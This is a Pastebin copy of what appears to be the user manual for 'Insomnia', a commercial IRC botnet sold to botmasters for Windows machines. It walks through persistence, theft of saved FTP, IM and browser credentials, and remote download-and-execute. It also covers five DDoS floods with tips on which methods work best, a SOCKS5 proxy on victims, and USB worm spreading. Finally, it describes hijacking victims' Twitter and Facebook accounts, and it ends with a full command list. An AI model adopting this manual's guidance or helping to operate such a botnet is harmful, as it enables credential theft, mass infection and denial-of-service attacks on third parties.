Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Table of Contents
- 1. Summary
- 2. Core Features
- 3. Malware Removal
- 4. SOCKS5
- 5. DDoS
- 6. Spreading Modules
- 7. Topic Generator Explained
- 8. Complete command list
- Summary
- Insomnia was developed in Visual Studio 2010 using the C# language. The binary is
- compiled under the 2.0 distribution of the .NET Framework. Insomnia was primarily
- designed for the botmaster who plans to build a network with machines that have the
- .NET framework installed. During development, the infection of newer operating
- systems was considered, and Insomnia is fully compatible with Windows 8 Development
- Preview at this time, and should work fine on the release builds.
- Insomnia has been tested to function on Windows NT based operating systems,
- specifically the following:
- Windows XP
- Windows Server 2003 / R2
- Windows Vista
- Windows Server 2008 / R2
- Windows 7
- Windows 8 Development Preview
- If Insomnia acquires administrative rights on the target machine, it will install to
- HKLM rather than HKCU, allowing it to be executed under all user accounts on the
- machine. It will also make use of specific Windows API calls that only function under
- elevated permissions, improving the functionality of some malware removal features
- such as Ruskill.
- Upon execution, Insomnia gathers it’s country location from http://api.wipmania.com.
- If for some reason this website can’t be accessed, Insomnia will default to system
- locale information.
- Insomnia’s nick generation pattern is based on a series of information. Here is a
- breakdown:
- n{US|XP-32a}dnskifj
- The lowercase ‘n’ in the nick signifies that Insomnia has recently been
- installed within the past hour, implying that it is most likely a new
- installation.
- The next part is the GeoIP location of the PC Insomnia is running on. US being
- United States.
- This is followed by the version of windows (Windows XP 32 bit), and the
- lowercase ‘a’ signifies that the bot is running with administrative
- privileges. If the bot is only running as a standard user, it will show a
- lowercase ‘u’ instead.
- The rest of the nick is made up of seven randomly generated characters to
- avoid nick collision.
- Core Features
- Connection Information
- Insomnia supports the IRC protocol along with SSL (Secure-Socket-Layer) connections.
- SSL is recommended, as the downside to normal IRC connections is that they are easily
- recognized. Using normal connections can put Insomnia at risk of detection, while
- exposing information that is exchanged on your network.
- Insomnia may be compiled to support connections to multiple servers at request. There
- is no limit at this time.
- Quit Messages
- IRC quit messages are decided by listening to WM_QUERYENDSESSION. This lets insomnia
- include the reason the process is terminating, if it is related to a Windows session
- attempting to close. If the bot process is terminated abnormally or fails to acquire
- a reason, it will be the standard ‚Connection reset by peer‛. Currently Insomnia
- detects and outputs three types of quit messages:
- Windows is shutting down…
- Windows is logging off…
- Windows is going to sleep…
- Registry Persistence
- Insomnia actively monitors the registry for changes, by pinvoking a series of Windows
- API functions such as RegNotifyKeyChangeValue. If it finds out that its registry key
- was modified or deleted, it will fix it immediately.
- Core command list
- These commands signify features that are found in the basic compile of Insomnia, and
- are included in every binary available for purchase, without the addition of separate
- modules.
- Command
- .v
- .m on/off
- .avinfo
- .j #channel
- .p #channel
- .sort
- .unsort
- .permsort
- .rm
- .rc
- .ftp
- .im
- .read URL
- .open FILE/URL
- .open FILE/URL –h
- .dl URL
- .dl URL –m
- .dl URL –t X
- The rest of the commands are discussed in their appropriate sections below. You can find a
- complete command list on the very last page of this document.
- Description
- Outputs version, MD5 hash, process path, registry location.
- Toggles mute (blocks all output).
- Display current Antivirus/Firewall programs installed. (Vista+)
- Joins a channel.
- Parts a channel.
- Sorts bots into channels based on their country. (#US, #RU, etc).
- Parts the sorted channels.
- Sorts the bots based on privileges. (#users/#admins).
- Completely removes Insomnia from the machine.
- Reconnects to IRC after waiting 10 seconds.
- Outputs saved FTP credentials on the machine.
- Outputs saved IM credentials on the machine.
- Reads encrypted topic commands from a remote URL
- Opens a URL or file on machine.
- Opens a URL or file on the machine but hides the window.
- Downloads a file and executes it.
- Downloads a file and executes it in memory (.NET files only)
- Downloads a file and terminates after X seconds have passed.
- Malware Removal
- Botkiller
- Insomnia includes two types of malware removal commands. Those are as follows:
- Description
- Runs the standard botkiller module.
- Runs the botkiller module that terminates injected bots.
- The standard botkiller module works around a counter system. It first scans temporary
- folders, including %APPDATA% for any executable files that are currently running. It
- then checks if the files have a ‚hidden‛ attribute or not. Other checks are then
- performed including checking the registry startup locations. If an executable program
- violates a certain number of these checks, it’s safe to consider it ‚possibly
- malicious‛, and Insomnia will then terminate it, delete the registry key, and output
- and TCP connections associated with that process.
- The botkiller module that terminates injected bots uses a series of techniques to
- remove nearly all bots that inject into explorer/iexplore.
- Both of these commands perform different actions. If you want to give the best effort
- to clean a system from other common malware, it’s recommended you run both of these
- commands.
- Command
- .dl URL -r
- Description
- Starts the download and initiates the Ruskill module on the file.
- Ruskill is initiated by calling the download function with the ‘r’ parameter.
- Files downloaded with Ruskill enabled will be monitored and information will be
- outputted to the Ruskill channel.
- Ruskill attempts to discover all files dropped by that malware along with all
- registry keys created, and then reverse those changes the next time the PC reboots.
- It uses a set of Windows API calls to make this possible, deleting target files after
- AUTOCHK but before Windows creates any page files. Administrative rights can affect
- how well this feature works.
- Ruskill uses API calls similar to those in ngrBot/Autumn/Other Antivirus/File
- Assassin software.
- DDoS Functionality
- Insomnia includes five different methods to initiate distributed denial of service
- attacks. Two methods are primarily aimed at exploiting vulnerabilities in the Apache
- web server, by consuming all sockets and resources.
- While initiating a DDoS command, insomnia will stop all other active DDoS threads
- before starting. This helps allocate threads for the new DDoS command while not
- consuming too many resources client-side, and saturating the upstream (which may
- cause the bot to disconnect temporarily).
- Command
- .arme HOST TIME
- .slow HOST TIME
- .layer4 HOST PORT TIME
- .layer7 HOST PORT TIME
- .udp HOST PORT TIME
- Description
- Multithreaded
- Multithreaded
- Multithreaded
- Multithreaded
- Multithreaded
- Apache Remote Memory Exhaustion flood.
- Slowloris Flood
- Layer4 (SYN) Flood
- Layer7 (HTTP GET) Flood
- UDP Flood
- ARME (Apache Remote Memory Exhaustion)
- This method was discovered in late 2011 and is a modified port of the perl script by
- Kingcope. Running this with enough connections can actually cause Apache to swap
- memory to file system after RAM is consumed, and may result in the process being
- terminated as the host system becomes unstable. Higher-end servers or properly
- modified/configured Apache installations may not be vulnerable.
- Slowloris
- This method was developed by RSNAKE and made popular in 2009. This C# port works in
- the exact same way but with random user agents, random content length, and random
- header data so it's even harder to block from the host machine. It also uses GET and
- POST to do the attack which seems to have better results than sticking with just one
- method. Slowloris can take a while to consume all the sockets on the host machine,
- but it always wins in the end.
- This method simply does an HTTP GET request on the index page, and downloads the page
- data. Works good in high numbers. If you are focusing attacks on Apache webservers
- with small numbers, then the methods above are recommended.
- This method uses SynSockets to flood the server with TCP connections. It's not too
- hard to block server-side and is an older method, but if a server is vulnerable then
- it's highly effective.
- This flood is ideal for neighborhood connections or larger servers if you have the
- manpower to do it, flooding with UDP packets containing random data.
- SOCKS5 Module
- Description
- Attempts to start the SOCKS5 server and report back with results.
- This command will signal Insomnia to start the SOCKS5 server and attempt to test it’s
- connection. If everything worked out with no errors, it will output the IP:PORT
- USER:PASS to IRC so you are able to use them. It also attempts to map ports with the
- included uPnP library. If it succeeds it will signify it in the output.
- <n{US|W7-64u}dnsmdks> [SOCKS]: Attempting to start SOCKS server…
- <n{US|W7-64u}dnsmdks> [SOCKS]: Listening on [127.0.0.1:9001] [user:pass] [uPnP=yes]
- Spreaders
- USB .LNK Spread
- This module runs automatically. Upon initial bot execution it scans for USB Removable
- Media. When found, it scans the drive for folders, creating appropriate LNK files and
- hiding the originals. It also listens for new devices and infects them as they are
- added. This module will output to IRC after a successful infection.
- <n{US|W7-64u}dnsmdks> [USB]: Completed LNK spread on (G:\) with 7 files.
- Twitter
- Command
- .twitter “msg”
- This module queries the chrome grabber for accounts that fit twitter.com, and
- attempts to login. If the login was a success, it proceeds to update the status to
- the specified message. This does NOT use the Twitter API and does NOT require OAuth.
- It simulates the http web requests made by a real browser to login to twitter and
- update the status.
- <n{US|W7-64u}dnsmdks> [TWITTER]: Status updated. (user@email.com => ‚msg‛ )
- Description
- Updates twitter status on the system.
- Facebook
- Command
- .facebook “msg”
- This module queries the chrome grabber for accounts that fit facebook.com, and
- attempts to login. If the login was a success, it proceeds to gather information
- about the Facebook account required to login to the Facebook chat system via the XMPP
- protocol. Once the data is acquired, resources are disposed of and a chat session is
- initiated with the user's credentials. Once the module has access to the chat system,
- it will begin to send the message you provided with the given options.
- You can specify to send to only online/offline friends with the parameters above. You
- can also specify to send to a certain number of friends (the friends will be randomly
- chosen), by using the –f parameter followed by a number of your choice.
- <n{US|W7-64u}dnsmdks> [FACEBOOK]: Spreader module started. (user@email.com => ‚msg‛)
- Description
- Starts facebook spread module with specified message.
- Topic Generator
- Insomnia comes with a topic generation utility to help you secure your topic commands
- from prying eyes, and simplify commands that should be performed in sequential order.
- To use, please run the topic generator that was included with your purchase. Each
- customer gets a topic generator that encrypts based on your unique customer ID, so no
- one else with the topic generator could interact with your binary, compiled with the
- same customer ID.
- To use the Topic Generator, simply type in the commands exactly how you would in IRC,
- then click Add. The topic generator will add them to the listview, automatically
- parsing and detecting the parameters.
- When you are all finished, click Generate, and use the topic in IRC. If a topic is
- too big for the IRC topic character limit, you can host the encrypted commands and
- set the topic to the encrypted version of .read http://yoururl.com/commands.txt
- Complete Command List
- .m on/off
- .avinfo
- .j #channel
- .p #channel
- .sort
- .unsort
- .permsort
- .rm
- .rc
- .ftp
- .im
- .read URL
- .open FILE/URL
- .open FILE/URL –h
- .dl URL
- .dl URL –m
- .dl URL –t X
- .dl URL –r
- .socks
- .speedtest URL
- .bk
- .bk –i
- .getadmin
- .acc keyword
- .arme HOST TIME
- .slow HOST TIME
- .layer4 HOST PORT TIME
- .layer7 HOST PORT TIME
- .udp HOST PORT TIME
- Description
- Outputs version, MD5 hash, process path, registry
- location.
- Toggles mute (blocks all output).
- Display current Antivirus/Firewall programs installed.
- (Vista+)
- Joins a channel.
- Parts a channel.
- Sorts bots into channels based on their country. (#US,
- #RU, etc).
- Parts the sorted channels.
- Sorts the bots based on privileges. (#users/#admins).
- Completely removes Insomnia from the machine.
- Reconnects to IRC after waiting 10 seconds.
- Outputs saved FTP credentials on the machine.
- Outputs saved IM credentials on the machine.
- Reads encrypted topic commands from a remote URL
- Opens a URL or file on machine.
- Opens a URL or file on the machine but hides the window.
- Downloads a file and executes it.
- Downloads a file and executes it in memory (.NET files
- only)
- Downloads a file and terminates after X seconds have
- passed.
- Downloads a file with Ruskill and outputs to Ruskill
- channel.
- Attempts to start SOCKS5 server
- Download the URL and output speed information.
- Standard botkiller module
- Injected botkiller module
- Added by request. Prompts UAC for admin, if acquires,
- restarts.
- Chrome grabber based on url keyword. Leave keyword blank
- for all.
- Multithreaded Apache Remote Memory Exhaustion flood.
- Multithreaded Slowloris Flood
- Multithreaded Layer4 (SYN) Flood
- Multithreaded Layer7 (HTTP GET) Flood
- Multithreaded UDP Flood
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement